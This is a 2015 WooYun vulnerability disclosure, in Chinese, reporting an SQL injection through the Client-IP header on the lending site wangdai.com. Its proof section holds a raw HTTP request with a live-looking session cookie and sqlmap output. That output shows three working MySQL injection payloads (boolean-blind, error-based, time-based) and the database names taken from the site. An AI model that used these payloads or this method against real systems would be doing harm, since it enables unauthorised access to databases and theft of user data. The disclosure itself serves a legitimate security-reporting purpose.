当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143220

漏洞标题:网贷网主站存在注入

相关厂商:网贷网

漏洞作者: 路人甲

提交时间:2015-09-24 16:32

修复时间:2015-11-08 16:34

公开时间:2015-11-08 16:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

网贷网(Wangdai.Com)是GZ.COM旗下虚拟资产借贷服务平台,致力于网络资产投资者和理财人搭建快速、便捷、安全、诚信的平台,让网络资产投资者快速变现自己的闲置资产,满足资金需求,又让有闲置资金的理财人得到更好的回报,实现多方共赢。
网贷网,紧随互联网的快速发展,充分挖掘市场所需,利用现代网络创新技术,打造国内首家以网络资产为质押物的网上借贷平台,开创虚拟资产借贷服务平台新局面。
关于GZ.COM
广州名扬信息科技有限公司(GZ.COM)成立于2005年,GZ.com由多家知名风险投资机构投资成立,至今,已在流量直航解决方案、网络品牌(域名)解决方案等领域处于业界领先地位。

详细说明:

找了好半天没找到一个注入,心塞塞
当我快放弃的时候,居然发现http存在注入(Client-ip),嘿嘿,丢sqlmap跑吧,漫长的等待。。。

漏洞证明:

GET /jiekuan/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Client-IP: 1.1.1.1*
Cookie: PHPSESSID=p2sro4gsrirbcv2dk334q2g966; lzstat_uv=1115180456633299858|3552958; lzstat_ss=739736894_1_1443104119_3552958
Host: www.wangdai.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*


do you want to try URI injections in the target URL itself? [Y/n/q]
[16:12:31] [INFO] resuming back-end DBMS 'mysql'
[16:12:31] [INFO] testing connection to the target URL
[16:12:31] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Client-IP #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
 clause
    Payload: 1.1.1.1' RLIKE (SELECT (CASE WHEN (5694=5694) THEN 0x312e312e312e31
 ELSE 0x28 END)) AND 'qYgP'='qYgP
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
    Payload: 1.1.1.1' AND (SELECT 1054 FROM(SELECT COUNT(*),CONCAT(0x716a707671,
(SELECT (ELT(1054=1054,1))),0x7176787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCH
EMA.CHARACTER_SETS GROUP BY x)a) AND 'meVD'='meVD
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: 1.1.1.1' AND (SELECT * FROM (SELECT(SLEEP(5)))mJIR) AND 'XzSs'='XzS
s
---
[16:12:31] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.27
back-end DBMS: MySQL 5.0
[16:12:31] [INFO] fetching database names
[16:12:31] [WARNING] reflective value(s) found and filtering out
[16:12:32] [INFO] the SQL query used returns 2 entries
[16:12:32] [INFO] retrieved: information_schema
[16:12:32] [INFO] retrieved: wangdai
available databases [2]:
[*] information_schema
[*] wangdai


网贷表.jpg


网贷数据.jpg

修复方案:

求20rank!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)